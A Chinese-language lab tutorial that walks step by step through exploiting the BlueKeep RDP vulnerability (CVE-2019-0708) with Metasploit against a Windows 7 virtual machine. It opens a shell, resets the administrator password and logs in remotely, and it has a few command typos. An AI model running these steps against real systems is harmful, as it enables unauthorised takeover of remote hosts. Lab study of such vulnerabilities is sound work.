远程桌面代码漏洞(远程桌面漏洞怎么修复)

一、背景介绍

Windows 系列服务器于 2019 年 5 月 15 号,被爆出高危漏洞,该服务器漏洞利用方式是通过远程桌面端口3389进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的永恒之蓝病毒差不多。2019年9月7日晚上凌晨 1 点左右,metaspolit 官方更新了漏洞利用程序。CVE-2019-0708 漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过 rdp 协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器被黑客入侵、感染病毒,像WannaCry永恒之蓝一样大规模的感染。该漏洞影响范围较广,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系统都会遭到攻击。那么如何利用该漏洞拿下目标主机呢,接下来让我们一起学习!

二、资源装备

1.安装好 Kali Linux 的虚拟机一台

2.Win7 SP1受害者主机一个;

3.整装待发的小白一个。

 

三、渗透实战

3.1 打开Metasploit渗透框架,如下如所示。

命令:msfconsole

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.2 检索有关远程桌面的已知漏洞,如下图所示。

命令:search 0708

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.3 使用检索到的关于远程桌面的漏洞利用模块,如下图所示。

命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.4 查看攻击目标需要设置的参数,如下图所示。

命令:show targets

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.5 设置相关攻击参数,如下图所示。

命令:set rhosts 192.168.0.106

set lhost 192.168.0.102

set target 4

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.6 执行漏洞攻击模块,如下图所示。

命令:run

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.7 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。

命令:sysinfo

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.8 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。

命令:ipconfig

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.9 查看会话命令帮助信息,如下图所示。

命令:?

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.10 进入受害者主机cmd界面并解决乱码问题,如下图所示。

命令:shell

chnp 65001

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.11 利用“whoami”命令查看相关信息,如下图所示。

命令;whoami

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.12 利用cmd命令在受害者主机创建一个新用户,如下图所示。

命令:net user administrator 123456

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.13 利用图形化远程桌面登录工具登录受害者主机,如下图所示。

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.14 成功利用图形化远程登录工具拿下目标主机,如下图所示。

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

3.15 远程桌面漏洞防护措施,如下图所示(关闭远程桌面登录服务、开启防火墙、安装第三方电脑管家等等)。

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

 

远程桌面代码漏洞(远程桌面漏洞怎么修复)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发表评论

登录后才能评论